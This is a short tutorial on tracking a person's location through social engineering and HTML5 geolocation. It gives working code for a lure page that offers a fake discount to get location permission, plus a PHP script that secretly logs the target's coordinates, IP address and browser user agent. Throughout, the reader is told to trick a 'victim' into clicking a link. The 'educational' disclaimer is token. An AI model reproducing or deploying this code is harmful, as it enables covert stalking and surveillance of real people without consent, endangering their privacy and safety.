Tracking Location with Social Engineering and HTML5

TRACKING LOCATION

This article will teach a simple and efficient way to track the location of a user. This is just for education purpose, i won’t be responsible with what you do with the info.

This works on geolocation (the same method online sites like OLA and UBER use).

HTML5 introduced a very effective feature known as Geolocation API, used to lcoate a user’s location. The getCurrentPosition() is used to return the user’s location. You can read more about this HERE

:: PREREQUISITES ::

  • HTML
  • PHP

:: THE CODE ::


<!DOCTYPE html>
<html>
<body>
<p id="demo"></p>
<script>
document.write ("<h2>Allow location to avail a Big Discount</h2>");
var x = document.getElementById("demo");

function getLocation() {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
    } else { 
        x.innerHTML = "Geolocation is not supported by this browser.";
    }
}

function showPosition(position) {

var lat=position.coords.latitude;
var lon=position.coords.longitude;

window.location.href="submit.php?lati="+lat+"&longi="+lon;
}
getLocation();
</script>
</body>
</html>

So the function getLocation() will get the location of the user.

Victim will get a prompt to allow the location. Whether he allows or not now totally depends on your Social Engineering tricks.

Hint :: Append the body tag and make a fancy page ;D

window.location.href="submit.php?lati=" + lat + "&longi=" + lon;

The above line will send the latitude and longitude to submit.php file.


<?php
if (isset($_GET["lati"]) && isset($_GET["longi"]))
{
echo "Congrats! Credit Added";

$myfile = fopen("testfile.txt", "a");
fwrite($myfile, $_SERVER['HTTP_USER_AGENT']);
fwrite($myfile, "\n");
fwrite($myfile, $_SERVER['REMOTE_ADDR']);
fwrite($myfile, "\n");
fwrite($myfile, $_GET["lati"]);
fwrite($myfile, "\n");
fwrite($myfile, $_GET["longi"]);
fwrite($myfile, "\n\n");
fclose($myfile);


}
else
{
echo "An error occured. Please retry";
}

?>


The submit.php file apart from latitude and Longitude is also logging the Victim’s IP and UserAgent as a bonus in a file named testfile.txt 😀

Now our setup is ready just upload the files to your webserver. Send the link.

The victim will get a prompt to allow his location both in PC and smartphones.

Once Allowed you’ll get the details of your victim as shown in below image.

ENJOY !